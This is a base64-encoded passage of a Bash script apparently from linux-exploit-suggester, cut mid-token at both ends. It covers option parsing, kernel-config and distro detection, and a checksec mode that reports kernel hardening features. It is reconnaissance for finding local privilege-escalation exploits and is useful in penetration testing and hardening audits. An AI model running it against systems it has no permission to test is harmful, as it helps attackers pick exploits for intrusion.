dWNoIHN3aXRjaCBpbiBzeXNjdGwKICAgICAgICBbIC16ICIkY3VyVmFsIiAtYSAiJG9wdF9jaGVja3NlY19tb2RlIiA9ICJ0cnVlIiBdICYmIHJldHVybiAyCgogICAgICAgICMgZm9yIG90aGVyIG1vZGVzOiBza2lwIGlmIHRoZXJlIGlzIG5vIHN1Y2ggc3dpdGNoIGluIHN5c2N0bAogICAgICAgIFsgLXogIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgIyBjb21wYXJlICYgcmV0dXJuIHJlc3VsdAogICAgICAgIGNvbXBhcmVWYWx1ZXMgJGN1clZhbCAkdmFsICRzaWduICYmIHJldHVybiAwCgogICAgZWxpZiBbWyAiJElOIiA9fiBeY21kOi4qJCBdXTsgdGhlbgoKICAgICAgICAjIHNraXAgaWYgY2hlY2sgaXMgbm90IGFwcGxpY2FibGUgKC1rIG9yIC0tdW5hbWUgb3IgLXAgbW9kZXMpIG9yIGlmIHVzZXIgc2FpZCBzbyAoLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgIFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAidHJ1ZSIgXSAmJiByZXR1cm4gMAoKICAgICAgICBjbWQ9IiR7SU46NH0iCiAgICAgICAgaWYgZXZhbCAiJHtjbWR9IjsgdGhlbgogICAgICAgICAgICByZXR1cm4gMAogICAgICAgIGZpCiAgICBmaQoKICAgIHJldHVybiAxCn0KCmdldEtlcm5lbENvbmZpZygpIHsKCiAgICBpZiBbIC1mIC9wcm9jL2NvbmZpZy5neiBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9InpjYXQgL3Byb2MvY29uZmlnLmd6IgogICAgZWxpZiBbIC1mIC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIF0gOyB0aGVuCiAgICAgICAgS0NPTkZJRz0iY2F0IC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIgogICAgZWxpZiBbIC1mICIke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fSIvLmNvbmZpZyBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9ImNhdCAke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fS8uY29uZmlnIgogICAgZWxzZQogICAgICAgIEtDT05GSUc9IiIKICAgIGZpCn0KCmNoZWNrc2VjTW9kZSgpIHsKCiAgICBNT0RFPTAKCiAgICAjIHN0YXJ0IGFuYWx5c2lzCmZvciBGRUFUVVJFIGluICIke0ZFQVRVUkVTW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRkVBVFVSRSIKCgkjIG1vZGVzOiBrZXJuZWwtZmVhdHVyZSAoMSkgfCBody1mZWF0dXJlICgyKSB8IDNyZHBhcnR5LWZlYXR1cmUgKDMpIHwgYXR0YWNrLXN1cmZhY2UgKDQpCiAgICBOQU1FPSIke2FyclswXX0iCiAgICBQUkVfTkFNRT0iJHtOQU1FOjA6OH0iCiAgICBOQU1FPSIke05BTUU6OX0iCiAgICBpZiBbICIke1BSRV9OQU1FfSIgPSAic2VjdGlvbjoiIF07IHRoZW4KCQkjIGFkdmFuY2UgdG8gbmV4dCBNT0RFCgkJTU9ERT0kKCgkTU9ERSArIDEpKQoKICAgICAgICBlY2hvCiAgICAgICAgZWNobyAtZSAiJHtibGR3aHR9JHtOQU1FfSR7dHh0cnN0fSIKICAgICAgICBlY2hvCiAgICAgICAgY29udGludWUKICAgIGZpCgogICAgQVZBSUxBQkxFPSIke2FyclsxXX0iICYmIEFWQUlMQUJMRT0iJHtBVkFJTEFCTEU6MTF9IgogICAgRU5BQkxFPSQoZWNobyAiJEZFQVRVUkUiIHwgZ3JlcCAiZW5hYmxlZDogIiB8IGF3ayAtRidlZDogJyAne3ByaW50ICQyfScpCiAgICBhbmFseXNpc191cmw9JChlY2hvICIkRkVBVFVSRSIgfCBncmVwICJhbmFseXNpcy11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGF2YWlsYWJpbGl0eSByZXF1aXJlbWVudHMgJiBsb29wIHRocnUgYWxsIGF2YWlsYWJpbGl0eSByZXFzIG9uZSBieSBvbmUgJiBjaGVjayB3aGV0aGVyIGl0IGlzIG1ldAogICAgSUZTPScsJyByZWFkIC1yIC1hIGFycmF5IDw8PCAiJEFWQUlMQUJMRSIKICAgIEFWQUlMQUJMRV9SRVFTX05VTT0keyNhcnJheVtAXX0KICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPTAKCUNPTkZJRz0iIgogICAgZm9yIFJFUSBpbiAiJHthcnJheVtAXX0iOyBkbwoKCQkjIGZpbmQgQ09ORklHXyBuYW1lIChpZiBwcmVzZW50KSBmb3IgY3VycmVudCBmZWF0dXJlIChvbmx5IGZvciBkaXNwbGF5IHB1cnBvc2VzKQoJCWlmIFsgLXogIiRDT05GSUciIF07IHRoZW4KCQkJY29uZmlnPSQoZWNobyAiJFJFUSIgfCBncmVwICJDT05GSUdfIikKCQkJWyAtbiAiJGNvbmZpZyIgXSAmJiBDT05GSUc9IigkKGVjaG8gJFJFUSB8IGN1dCAtZCc9JyAtZjEpKSIKCQlmaQoKICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpOyB0aGVuCiAgICAgICAgICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPSQoKCRBVkFJTEFCTEVfUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGVuYWJsZW1lbnQgcmVxdWlyZW1lbnRzICYgbG9vcCB0aHJ1IGFsbCBlbmFibGVtZW50IHJlcXMgb25lIGJ5IG9uZSAmIGNoZWNrIHdoZXRoZXIgaXQgaXMgbWV0CiAgICBFTkFCTEVfUEFTU0VEX1JFUT0wCiAgICBFTkFCTEVfUkVRU19OVU09MAogICAgbm9TeXNjdGw9MAogICAgaWYgWyAtbiAiJEVOQUJMRSIgXTsgdGhlbgogICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRFTkFCTEUiCiAgICAgICAgRU5BQkxFX1JFUVNfTlVNPSR7I2FycmF5W0BdfQogICAgICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICAgICAgY21kU3Rkb3V0PSQoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpCiAgICAgICAgICAgIHJldFZhbD0kPwogICAgICAgICAgICBpZiBbICRyZXRWYWwgLWVxIDAgXTsgdGhlbgogICAgICAgICAgICAgICAgRU5BQkxFX1BBU1NFRF9SRVE9JCgoJEVOQUJMRV9QQVNTRURfUkVRICsgMSkpCiAgICAgICAgICAgIGVsaWYgWyAkcmV0VmFsIC1lcSAyIF07IHRoZW4KICAgICAgICAgICAgIyBzcGVjaWFsIGNhc2U6IHN5c2N0bCBlbnRyeSBpcyBub3QgcHJlc2VudCBvbiBnaXZlbiBzeXN0ZW06IHNpZ25hbCBpdCBhczogTi9BCiAgICAgICAgICAgICAgICBub1N5c2N0bD0xCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBmaQogICAgICAgIGRvbmUKICAgIGZpCgogICAgZmVhdHVyZT0kKGVjaG8gIiRGRUFUVVJFIiB8IGdyZXAgImZlYXR1cmU6ICIgfCBjdXQgLWQnICcgLWYgMi0pCgoJaWYgWyAtbiAiJGNtZFN0ZG91dCIgXTsgdGhlbgogICAgICAgIGlmIFsgIiRjbWRTdGRvdXQiIC1lcSAwIF07IHRoZW4KICAgICAgICAgICAgc3RhdGU9IlsgJHt0eHRyZWR9U2V0IHRvICRjbWRTdGRvdXQke3R4dHJzdH0gXSIKCQkJY21kU3Rkb3V0PSIiCiAgICAgICAgZWxzZQogICAgICAgICAgICBzdGF0ZT0iWyAke3R4dGdybn1TZXQgdG8gJGNtZFN0ZG91dCR7dHh0cnN0fSBdIgoJCQljbWRTdGRvdXQ9IiIKICAgICAgICBmaQogICAgZWxzZQoKCXVua25vd249IlsgJHt0eHRncmF5fVVua25vd24ke3R4dHJzdH0gIF0iCgoJIyBmb3IgM3JkIHBhcnR5ICgzKSBtb2RlIGRpc3BsYXkgIk4vQSIgb3IgIkVuYWJsZWQiCglpZiBbICRNT0RFIC1lcSAzIF07IHRoZW4KICAgICAgICBlbmFibGVkPSJbICR7dHh0Z3JufUVuYWJsZWQke3R4dHJzdH0gICBdIgogICAgICAgIGRpc2FibGVkPSJbICAgJHt0eHRncmF5fU4vQSR7dHh0cnN0fSAgICBdIgoKICAgICMgZm9yIGF0dGFjay1zdXJmYWNlICg0KSBtb2RlIGRpc3BsYXkgIkxvY2tlZCIgb3IgIkV4cG9zZWQiCiAgICBlbGlmIFsgJE1PREUgLWVxIDQgXTsgdGhlbgogICAgICAgZW5hYmxlZD0iWyAke3R4dHJlZH1FeHBvc2VkJHt0eHRyc3R9ICBdIgogICAgICAgZGlzYWJsZWQ9IlsgJHt0eHRncm59TG9ja2VkJHt0eHRyc3R9ICAgXSIKCgkjb3RoZXIgbW9kZXMiICJEaXNhYmxlZCIgLyAiRW5hYmxlZCIKCWVsc2UKCQllbmFibGVkPSJbICR7dHh0Z3JufUVuYWJsZWQke3R4dHJzdH0gIF0iCgkJZGlzYWJsZWQ9IlsgJHt0eHRyZWR9RGlzYWJsZWQke3R4dHJzdH0gXSIKCWZpCgoJaWYgWyAteiAiJEtDT05GSUciIC1hICIkRU5BQkxFX1JFUVNfTlVNIiA9IDAgXTsgdGhlbgoJICAgIHN0YXRlPSR1bmtub3duCiAgICBlbGlmIFsgJEFWQUlMQUJMRV9QQVNTRURfUkVRIC1lcSAkQVZBSUxBQkxFX1JFUVNfTlVNIC1hICRFTkFCTEVfUEFTU0VEX1JFUSAtZXEgJEVOQUJMRV9SRVFTX05VTSBdOyB0aGVuCiAgICAgICAgc3RhdGU9JGVuYWJsZWQKICAgIGVsc2UKICAgICAgICBzdGF0ZT0kZGlzYWJsZWQKCWZpCgogICAgZmkKCiAgICBlY2hvIC1lICIgJHN0YXRlICRmZWF0dXJlICR7d2h0fSR7Q09ORklHfSR7dHh0cnN0fSIKICAgIFsgLW4gIiRhbmFseXNpc191cmwiIF0gJiYgZWNobyAtZSAiICAgICAgICAgICAgICAkYW5hbHlzaXNfdXJsIgogICAgZWNobwoKZG9uZQoKfQoKZGlzcGxheUV4cG9zdXJlKCkgewogICAgUkFOSz0kMQoKICAgIGlmIFsgIiRSQU5LIiAtZ2UgNiBdOyB0aGVuCiAgICAgICAgZWNobyAiaGlnaGx5IHByb2JhYmxlIgogICAgZWxpZiBbICIkUkFOSyIgLWdlIDMgXTsgdGhlbgogICAgICAgIGVjaG8gInByb2JhYmxlIgogICAgZWxzZQogICAgICAgIGVjaG8gImxlc3MgcHJvYmFibGUiCiAgICBmaQp9CgojIHBhcnNlIGNvbW1hbmQgbGluZSBwYXJhbWV0ZXJzCkFSR1M9JChnZXRvcHQgLS1vcHRpb25zICRTSE9SVE9QVFMgIC0tbG9uZ29wdGlvbnMgJExPTkdPUFRTIC0tICIkQCIpClsgJD8gIT0gMCBdICYmIGV4aXRXaXRoRXJyTXNnICJBYm9ydGluZy4iCgpldmFsIHNldCAtLSAiJEFSR1MiCgp3aGlsZSB0cnVlOyBkbwogICAgY2FzZSAiJDEiIGluCiAgICAgICAgLXV8LS11bmFtZSkKICAgICAgICAgICAgc2hpZnQKICAgICAgICAgICAgVU5BTUVfQT0iJDEiCiAgICAgICAgICAgIG9wdF91bmFtZV9zdHJpbmc9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1WfC0tdmVyc2lvbikKICAgICAgICAgICAgdmVyc2lvbgogICAgICAgICAgICBleGl0IDAKICAgICAgICAgICAgOzsKICAgICAgICAtaHwtLWhlbHApCiAgICAgICAgICAgIHVzYWdlIAogICAgICAgICAgICBleGl0IDAKICAgICAgICAgICAgOzsKICAgICAgICAtZnwtLWZ1bGwpCiAgICAgICAgICAgIG9wdF9mdWxsPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtZ3wtLXNob3J0KQogICAgICAgICAgICBvcHRfc3VtbWFyeT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLWJ8LS1mZXRjaC1iaW5hcmllcykKICAgICAgICAgICAgb3B0X2ZldGNoX2JpbnM9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1zfC0tZmV0Y2gtc291cmNlcykKICAgICAgICAgICAgb3B0X2ZldGNoX3NyY3M9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1rfC0ta2VybmVsKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBLRVJORUw9IiQxIgogICAgICAgICAgICBvcHRfa2VybmVsX3ZlcnNpb249dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1kfC0tc2hvdy1kb3MpCiAgICAgICAgICAgIG9wdF9zaG93X2Rvcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLXB8LS1wa2dsaXN0LWZpbGUpCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIFBLR0xJU1RfRklMRT0iJDEiCiAgICAgICAgICAgIG9wdF9wa2dsaXN0X2ZpbGU9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tY3ZlbGlzdC1maWxlKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBDVkVMSVNUX0ZJTEU9IiQxIgogICAgICAgICAgICBvcHRfY3ZlbGlzdF9maWxlPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLWNoZWNrc2VjKQogICAgICAgICAgICBvcHRfY2hlY2tzZWNfbW9kZT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1rZXJuZWxzcGFjZS1vbmx5KQogICAgICAgICAgICBvcHRfa2VybmVsX29ubHk9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tdXNlcnNwYWNlLW9ubHkpCiAgICAgICAgICAgIG9wdF91c2Vyc3BhY2Vfb25seT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgICAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1za2lwLXBrZy12ZXJzaW9ucykKICAgICAgICAgICAgb3B0X3NraXBfcGtnX3ZlcnNpb25zPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAqKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBpZiBbICIkIyIgIT0gIjAiIF07IHRoZW4KICAgICAgICAgICAgICAgIGV4aXRXaXRoRXJyTXNnICJVbmtub3duIG9wdGlvbiAnJDEnLiBBYm9ydGluZy4iCiAgICAgICAgICAgIGZpCiAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIDs7CiAgICBlc2FjCiAgICBzaGlmdApkb25lCgojIGNoZWNrIEJhc2ggdmVyc2lvbiAoYXNzb2NpYXRpdmUgYXJyYXlzIG5lZWQgQmFzaCBpbiB2ZXJzaW9uIDQuMCspCmlmICgoQkFTSF9WRVJTSU5GT1swXSA8IDQpKTsgdGhlbgogICAgZXhpdFdpdGhFcnJNc2cgIlNjcmlwdCBuZWVkcyBCYXNoIGluIHZlcnNpb24gNC4wIG9yIG5ld2VyLiBBYm9ydGluZy4iCmZpCgojIGV4aXQgaWYgYm90aCAtLWtlcm5lbCBhbmQgLS11bmFtZSBhcmUgc2V0ClsgIiRvcHRfa2VybmVsX3ZlcnNpb24iID0gInRydWUiIF0gJiYgWyAkb3B0X3VuYW1lX3N0cmluZyA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAta3wtLWtlcm5lbCBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCgojIGV4aXQgaWYgYm90aCAtLWZ1bGwgYW5kIC0tc2hvcnQgYXJlIHNldApbICIkb3B0X2Z1bGwiID0gInRydWUiIF0gJiYgWyAkb3B0X3N1bW1hcnkgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWZ8LS1mdWxsIGFuZCAtZ3wtLXNob3J0IGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKCiMgLS1jdmVsaXN0LWZpbGUgbW9kZSBpcyBzdGFuZGFsb25lIG1vZGUgYW5kIGlzIG5vdCBhcHBsaWNhYmxlIHdoZW4gb25lIG9mIC1rIHwgLXUgfCAtcCB8IC0tY2hlY2tzZWMgc3dpdGNoZXMgYXJlIHNldAppZiBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXTsgdGhlbgogICAgWyAhIC1lICIkQ1ZFTElTVF9GSUxFIiBdICYmIGV4aXRXaXRoRXJyTXNnICJQcm92aWRlZCBDVkUgbGlzdCBmaWxlIGRvZXMgbm90IGV4aXN0cy4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWt8LS1rZXJuZWwgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAtLWN2ZWxpc3QtZmlsZSBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCiAgICBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLXB8LS1wa2dsaXN0LWZpbGUgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKZmkKCiMgLS1jaGVja3NlYyBtb2RlIGlzIHN0YW5kYWxvbmUgbW9kZSBhbmQgaXMgbm90IGFwcGxpY2FibGUgd2hlbiBvbmUgb2YgLWsgfCAtdSB8IC1wIHwgLS1jdmVsaXN0LWZpbGUgc3dpdGNoZXMgYXJlIHNldAppZiBbICIkb3B0X2NoZWNrc2VjX21vZGUiID0gInRydWUiIF07IHRoZW4KICAgIFsgIiRvcHRfa2VybmVsX3ZlcnNpb24iID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC1rfC0ta2VybmVsIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfcGtnbGlzdF9maWxlIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtcHwtLXBrZ2xpc3QtZmlsZSBhbmQgLS1jaGVja3NlYyBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCmZpCgojIGV4dHJhY3Qga2VybmVsIHZlcnNpb24gYW5kIG90aGVyIE9TIGluZm8gbGlrZSBkaXN0cm8gbmFtZSwgZGlzdHJvIHZlcnNpb24sIGV0Yy4gMyBwb3NzaWJpbGl0aWVzIGhlcmU6CiMgY2FzZSAxOiAtLWtlcm5lbCBzZXQKaWYgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPT0gInRydWUiIF07IHRoZW4KICAgICMgVE9ETzogYWRkIGtlcm5lbCB2ZXJzaW9uIG51bWJlciB2YWxpZGF0aW9uCiAgICBbIC16ICIkS0VSTkVMIiBdICYmIGV4aXRXaXRoRXJyTXNnICJVbnJlY29nbml6ZWQga2VybmVsIHZlcnNpb24gZ2l2ZW4uIEFib3J0aW5nLiIKICAgIEFSQ0g9IiIKICAgIE9TPSIiCgogICAgIyBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyBvbiBjdXJyZW50IG1hY2hpbmUKICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKCiAgICAjIGRvIG5vdCBjb25zaWRlciBjdXJyZW50IE9TCiAgICBnZXRQa2dMaXN0ICIiICIkUEtHTElTVF9GSUxFIgoKIyBjYXNlIDI6IC0tdW5hbWUgc2V0CmVsaWYgWyAiJG9wdF91bmFtZV9zdHJpbmciID09ICJ0cnVlIiBdOyB0aGVuCiAgICBbIC16ICIkVU5BTUVfQSIgXSAmJiBleGl0V2l0aEVyck1zZyAidW5hbWUgc3RyaW5nIGVtcHR5LiBBYm9ydGluZy4iCiAgICBwYXJzZVVuYW1lICIkVU5BTUVfQSIKCiAgICAjIGRvIG5vdCBwZXJmb3JtIGFkZGl0aW9uYWwgY2hlY2tzIG9uIGN1cnJlbnQgbWFjaGluZQogICAgb3B0X3NraXBfbW9yZV9jaGVja3M9dHJ1ZQoKICAgICMgZG8gbm90IGNvbnNpZGVyIGN1cnJlbnQgT1MKICAgIGdldFBrZ0xpc3QgIiIgIiRQS0dMSVNUX0ZJTEUiCgojIGNhc2UgMzogLS1jdmVsaXN0LWZpbGUgbW9kZQplbGlmIFsgIiRvcHRfY3ZlbGlzdF9maWxlIiA9ICJ0cnVlIiBdOyB0aGVuCgogICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIGdldEtlcm5lbENvbmZpZwoKIyBjYXNlIDQ6IC0tY2hlY2tzZWMgbW9kZQplbGlmIFsgIiRvcHRfY2hlY2tzZWNfbW9kZSIgPSAidHJ1ZSIgXTsgdGhlbgoKICAgICMgdGhpcyBzd2l0Y2ggaXMgbm90IGFwcGxpY2FibGUgaW4gdGhpcyBtb2RlCiAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz1mYWxzZQoKICAgICMgZ2V0IGtlcm5lbCBjb25maWd1cmF0aW9uIGluIHRoaXMgbW9kZQogICAgZ2V0S2VybmVsQ29uZmlnCiAgICBbIC16ICIkS0NPTkZJRyIgXSAmJiBlY2hvICJXQVJOSU5HLiBLZXJuZWwgQ29uZmlnIG5vdCBmb3VuZCBvbiB0aGUgc3lzdGVtIHJlc3VsdHMgd29uJ3QgYmUgY29tcGxldGUuIgoKICAgICMgbGF1bmNoIGNoZWNrc2VjIG1vZGUKICAgIGNoZWNrc2VjTW9kZQoKICAgIGV4aXQgMAoKIyBjYXNlIDU6IG5vIC0tdW5hbWUgfCAtLWtlcm5lbCB8IC0tY3ZlbGlzdC1maWxlIHwgLS1jaGVja3NlYyBzZXQKZWxzZQoKICAgICMgLS1wa2dsaXN0LWZpbGUgTk9UIHByb3ZpZGVkOiB0YWtlIGFsbCBpbmZvIGZyb20gY3VycmVudCBtYWNoaW5lCiAgICAjIGNhc2UgZm9yIHZhbmlsbGEgZXhlY3V0aW9uOiAuL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoCiAgICBpZiBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPT0gImZhbHNlIiBdOyB0aGVuCiAgICAgICAgVU5BTUVfQT0kKHVuYW1lIC1hKQogICAgICAgIFsgLXogIiRVTkFNRV9BIiBdICYmIGV4aXRXaXRoRXJyTXNnICJ1bmFtZSBzdHJpbmcgZW1wdHkuIEFib3J0aW5nLiIKICAgICAgICBwYXJzZVVuYW1lICIkVU5BTUVfQSIKCiAgICAgICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJmYWxzZSIgXSAmJiBnZXRLZXJuZWxDb25maWcKCiAgICAgICAgIyBleHRyYWN0IGRpc3RyaWJ1dGlvbiB2ZXJzaW9uIGZyb20gL2V0Yy9vcy1yZWxlYXNlIE9SIC9ldGMvbHNiLXJlbGVhc2UKICAgICAgICBbIC1uICIkT1MiIC1hICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIERJU1RSTz0kKGdyZXAgLXMgLUUgJ15ESVNUUklCX1JFTEVBU0U9fF5WRVJTSU9OX0lEPScgL2V0Yy8qLXJlbGVhc2UgfCBjdXQgLWQnPScgLWYyIHwgaGVhZCAtMSB8IHRyIC1kICciJykKCiAgICAgICAgIyBleHRyYWN0IHBhY2thZ2UgbGlzdGluZyBmcm9tIGN1cnJlbnQgT1MKICAgICAgICBnZXRQa2dMaXN0ICIkT1MiICIiCgogICAgIyAtLXBrZ2xpc3QtZmlsZSBwcm92aWRlZDogb25seSBjb25zaWRlciB1c2Vyc3BhY2UgZXhwbG9pdHMgYWdhaW5zdCBwcm92aWRlZCBwYWNrYWdlIGxpc3RpbmcKICAgIGVsc2UKICAgICAgICBLRVJORUw9IiIKICAgICAgICAjVE9ETzogZXh0cmFjdCBtYWNoaW5lIGFyY2ggZnJvbSBwYWNrYWdlIGxpc3RpbmcKICAgICAgICBBUkNIPSIiCiAgICAgICAgdW5zZXQgRVhQTE9JVFMKICAgICAgICBkZWNsYXJlIC1BIEVYUExPSVRTCiAgICAgICAgZ2V0UGtnTGlzdCAiIiAiJFBLR0xJU1RfRklMRSIKCiAgICAgICAgIyBhZGRpdGlvbmFsIGNoZWNrcyBhcmUgbm90IGFwcGxpY2FibGUgZm9yIHRoaXMgbW9kZQogICAgICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKICAgIGZpCmZpCgplY2hvCmVjaG8gLWUgIiR7Ymxkd2h0fUF2YWlsYWJsZSBpbmZvcm1hdGlvbjoke3R4dHJzdH0iCmVjaG8KWyAtbiAiJEtFUk5FTCIgXSAmJiBlY2hvIC1lICJLZXJuZWwgdmVyc2lvbjogJHt0eHRncm59JEtFUk5FTCR7dHh0cnN0fSIgfHwgZWNobyAtZSAiS2VybmVsIHZlcnNpb246ICR7dHh0cmVkfU4vQSR7dHh0cnN0fSIKZWNobyAiQXJjaGl0ZWN0dXJlOiAkKFsgLW4gIiRBUkNIIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRBUkNIJHt0eHRyc3R9IiB8fCBlY2hvIC1lICIke3R4dHJlZH1OL0Eke3R4dHJzdH0iKSIKZWNobyAiRGlzdHJpYnV0aW9uOiAkKFsgLW4gIiRPUyIgXSAmJiBlY2hvIC1lICIke3R4dGdybn0kT1Mke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgplY2hvIC1lICJEaXN0cmlidXRpb24gdmVyc2lvbjogJChbIC1uICIkRElTVFJPIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRESVNUUk8ke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgoKZWNobyAiQWRkaXRpb25hbCBjaGVja3MgKENPTkZJR18qLCBzeXNjdGwgZW50cmllcywgY3VzdG9tIEJhc2ggY29tbWFuZHMpOiAkKFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPT0gImZhbHNlIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufXBlcmZvcm1lZCR7dHh0cnN0fSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCgppZiBbIC1uICIkUEtHTElTVF9GSUxFIiAtYSAtbiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRncm59JFBLR0xJU1RfRklMRSR7dHh0cnN0fSIKZWxpZiBbIC1uICIkUEtHTElTVF9GSUxFIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRyZWR9dW5yZWNvZ25pemVkIGZpbGUgcHJvdmlkZWQke3R4dHJzdH0iCmVsaWYgWyAtbiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRncm59ZnJvbSBjdXJyZW50IE9TJHt0eHRyc3R9IgpmaQoKZWNobyAtZSAiUGFja2FnZSBsaXN0aW5nOiAkKFsgLW4gIiRwa2dMaXN0RmlsZSIgXSAmJiBlY2hvIC1lICIkcGtnTGlzdEZpbGUiIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgoKIyBoYW5kbGUgLS1rZXJuZWxzcGFjeS1vbmx5ICYgLS11c2Vyc3BhY2Utb25seSBmaWx0ZXIgb3B0aW9ucwpp